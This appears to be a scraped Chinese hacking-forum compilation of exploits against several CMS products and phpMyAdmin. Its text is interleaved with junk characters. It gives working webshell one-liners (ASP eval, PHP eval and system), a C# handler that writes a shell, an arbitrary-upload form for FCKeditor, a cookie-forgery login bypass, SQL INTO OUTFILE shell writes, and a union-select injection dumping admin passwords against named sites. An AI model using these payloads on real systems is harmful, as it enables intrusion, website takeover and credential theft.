http://xxoo.com/controls/fckedit ... aspx/connector.aspx
' n+ {( d' J7 {0 U* j3 R跳转到网站根目录上传任意文件。
2 v' n6 U) X& W6 b' e: H如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件
6 ^6 s% I8 t! `# a<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">' |3 m5 z- ` [/ O# x
Upload a new file:<br>
3 p) ]- Q& x- [, l4 V' R/ A) q<input type="file" name="NewFile" size="50"><br>
0 x2 O* U4 }# S% T+ V) T4 }<input id="btnUpload" type="submit" value="Upload">9 S* Q3 V$ h/ s: T8 ^: o$ o0 k
</form>
3 i1 g/ r/ E; o3 Z, m-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
1 Z5 W. I& y' n7 |2 X" I) l) i3 Y+ g1 M9 |# V3 Z3 X) E5 u! [7 M
SDcms 后台拿webshell( w! i) j. M) d/ E& m
6 o3 L+ b4 Z7 B9 K: }$ b7 |( A% v' q" A
第一种方法:
+ W- v! O- |5 }. g+ ?4 g/ z进入后台-->系统管理-->系统设置-->系统设置->网站名称;/ V& i% n+ e0 S; J
把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx; q- W, D2 o2 z" c( q
用菜刀链接http://www.xxx.com/inc/const.asp 就搞定了。- m! |/ \- S6 j
第二种方法:
7 I1 W) ~3 v m$ ]2 c. l. T进入后台-->系统管理-->系统设置-->系统设置->上传设置;
: R/ `8 t# }# V. w在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!
# L8 N6 L7 [* b5 [1 A3 G+ [+ E8 n第三种方法:
9 a# {# K' a- V7 {9 c5 p进入后台-->界面管理-->模板文件管理-->创建文件$ P' f, B! g# O5 L6 P
文件名写入getshell.ashx0 T: K) k! q) S+ `: t
内容写入下面内容:/ |2 j5 m! J5 e$ V S& v9 B' |
/====================复制下面的=========================/. i t6 m& d, K- N6 n
<%@ WebHandler Language="C#" Class="Handler" %>
7 D8 Y: I# L" w }: Qusing System;/ E3 y J2 p T: J' `& b3 i& m
using System.Web;
5 _0 ?) Y k8 \& ?/ h- gusing System.IO;4 N2 Q" i5 B: q; n2 ~7 |
public class Handler : IHttpHandler {; q2 t+ K( L$ M7 s4 A# w# H/ t
public void ProcessRequest (HttpContext context) {
) e2 p0 ^: O% ~' ycontext.Response.ContentType = "text/plain";4 A2 z I: X& g' [
StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));8 L* W+ N9 z' `5 T
file1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");5 S7 ^% |* U4 R2 h0 X
file1.Flush();# Q7 @& B9 g3 T3 ]4 `
file1.Close();
. L, S& z" R. ]2 w}
; Y2 ^- ~. |- y ` V/ hpublic bool IsReusable {
9 y8 h: b3 }: {get {
6 }& c/ c0 N: @% F& n4 Oreturn false;
. `4 @8 {# R! b, H: k8 b4 s! P" ]8 C}
- \: F4 j4 V7 u b% ]/ s4 v}" K- {+ R4 t3 @4 e0 i4 C i* g
}9 J1 F( \- q; \( F+ [
/=============================================/6 \: O0 L1 N) ?2 X: e. O6 `
访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx* }9 f: d$ [+ W# W1 L+ x K
会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接2 S- O0 O. O5 |: _. O
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
; N0 |4 u0 }/ a4 K6 G9 P$ p3 S% t% F4 M' Q) g$ N4 c8 u" _
ESCMS网站管理系统0day' C4 `" W0 K" m* r6 W( a
+ a0 t% G9 O: |/ ] e3 p
后台登陆验证是通过admin/check.asp实现的
3 A `$ g, e: K- r0 h, z. }$ }, S5 g9 `* ?2 ]
首先我们打开http://target.com/admin/es_index.html
* p o0 G& z' d然后在COOKIE结尾加上
- i& H; C8 O4 ~3 v& \0 s- [. x; ESCMS$_SP2=ES_admin=st0p;& ]/ i$ {9 ?9 G! I
修改,然后刷新 i2 B0 x- ^- m* M1 P+ L' X( v! M1 S
进后台了嘎..
' Z% R) z! z& g/ A然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL
( }3 k7 C" U/ m- J2 C( f8 E8 L9 e6 y
利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
8 w) f! b: m) B嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp( j+ a3 ]8 t; p$ Q8 J) T( @
存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..2 `; [2 J" ]3 O: ~; z `; l
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了$ n4 m$ M' x- W/ ~2 W, S- ~
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
* l4 ?. O: G2 ?/ j& a7 ]* L+ n, A: o$ _0 |0 \! V% X4 M, p% e+ U
宁志网站管理系统后台无验证漏洞及修复) E( |" ?+ D' I# I) ]1 t( |
0 u1 p9 s/ g3 T9 Y; N
网上搜了一下,好像没有发布.如有雷同纯粹巧合!
" `2 G/ B& A0 w9 }9 _$ k0 }官方网站:www.ningzhi.net4 ^0 q# I* O# S. G [$ O
学校网站管理系统 V.2011版本
3 ]# U( }* f {6 h: fhttp://down.chinaz.com/soft/29943.htm
! l5 d% `9 G. [6 X" ]其它版本(如:政府版等),自行下载.
0 G, d4 p8 P1 N6 I漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~
( B) g% t: A4 S9 Hlogin.asp代码如下:, J$ w9 b. D' g4 t/ T
<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %> 4 w* ^' `5 C' S/ Z2 h$ ?
manage.asp代码我就不帖出来了.反正也没验证.
! N$ j% Y, Y V' w9 J. u/ a只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!, q2 n2 a3 H; w& @# L" X& H
漏洞利用:; ]- E' V* s6 }6 X l1 q3 ?
直接访问http://www.0855.tv/admin/manage.asp5 U X% a+ L' D$ q u- @
数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5& N" h! Q2 v7 `$ L$ d& p3 k/ [
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
. }' H' g% j% G# j2 g" E, ?( ]+ ]& D# a! Z( z* A+ H+ j
phpmyadmin拿shell的四种方法总结及修复
+ U6 c' _& K% `/ `/ n9 T2 c( U
+ ]* f! o: ?# x! `4 {方法一:
, b8 V4 \- h5 e/ Y8 fCREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );' I2 _6 t. _; W; c9 m$ \
INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');% H. P& z7 H. {- u( V/ _4 e3 O; B
SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
+ E1 \/ }5 c- d3 Y. [----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php8 `! ?/ |) F# F: ]) |7 a
一句话连接密码:7on# M! d1 S! L0 G' {5 r/ s% C
方法二:
6 w$ w! }( S. n3 [. C读取文件内容: select load_file('E:/xamp/www/s.php');
7 u+ d" f0 x6 ^6 z3 S, @; ?5 |写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'
: K' j9 D0 ]7 d6 R1 ycmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'6 l: @# `2 M; G+ g
方法三:9 R9 d2 g' p' j& a: M9 y
JhackJ版本 PHPmyadmin拿shell
5 w' _" V& q8 r1 W; u! m* DCreate TABLE study (cmd text NOT NULL);" H% f4 k7 A, M3 `& @. q
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
; \" o7 z" }, I7 h( s( x2 dselect cmd from study into outfile 'E:/wamp/www/7.php';
3 W7 w' a) w; ^( YDrop TABLE IF EXISTS study;! U2 j$ y+ X3 ]3 a p
<?php eval($_POST[cmd])?>
4 D J5 B" R+ T, @# H- z" OCREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
1 A3 }* Z" b- mINSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1* [3 S6 k2 h2 x% A
SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1
8 q; \ Z4 m' @1 HDROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。/ m( ]4 ? R# V4 J4 ]. C% M- _
方法四:
7 |3 G U2 C. j, {* Iselect load_file('E:/xamp/www/study.php');- F& b! Y1 _5 Y) i+ w5 O
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
( w: z. M: C, _6 n( v/ w然后访问网站目录:http://www.2cto.com/study.php?cmd=dir
2 v1 o2 G' F; q& r# H9 U-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
. \4 L$ W0 I6 S
T7 B |5 s& i3 INO.001中学网站管理系统 Build 110628 注入漏洞% R; ^+ S; w$ E" [% e8 b' M$ j$ q
. Q: E& K5 m: Z$ Q6 }1 ]NO.001中学网站管理系统功能模块:
, G# n" ^4 V5 V1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等
. z6 @2 l" x# i0 C% a, I4 j2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息5 N3 {; g. |# S, e
3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息4 o* N: B) P" y, e* t |7 Z
4.视频图片管理:一级分类,动态添加视频或者图片等信息
+ r0 H9 _; c1 n2 f i* c G" @: o5.留言管理:对留言,修改,删除、回复等管理: Q0 A* X3 E. I9 ?. o3 c3 l! ]! {
6.校友频道:包括校友资料excel导出、管理等功能4 ` k# E G1 d; ^8 \
7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页
% q2 d3 s# \" \2 u3 O默认后台:admin/login.asp
2 H& B. w: X2 a4 B& n& i/ y官方演示:http://demo.001cms.net2 Y7 {9 |2 e( ^2 n/ V4 r! z; E; B
源码下载地址:http://down.chinaz.com/soft/30187.htm; t7 |* T4 H7 f+ E. T4 T% W
EXP:
: Y& v. F. {- y. X# f- Bunion select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin) A( n$ D# v# Q5 t1 @- J
测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
2 T+ C. Y3 ^, t) r1 B. H. pgetshell:后台有备份,你懂的
% w3 @- k9 `7 G& B# ^- r, ]另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。
. G4 \: S- N$ d. b5 p; [2 \------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |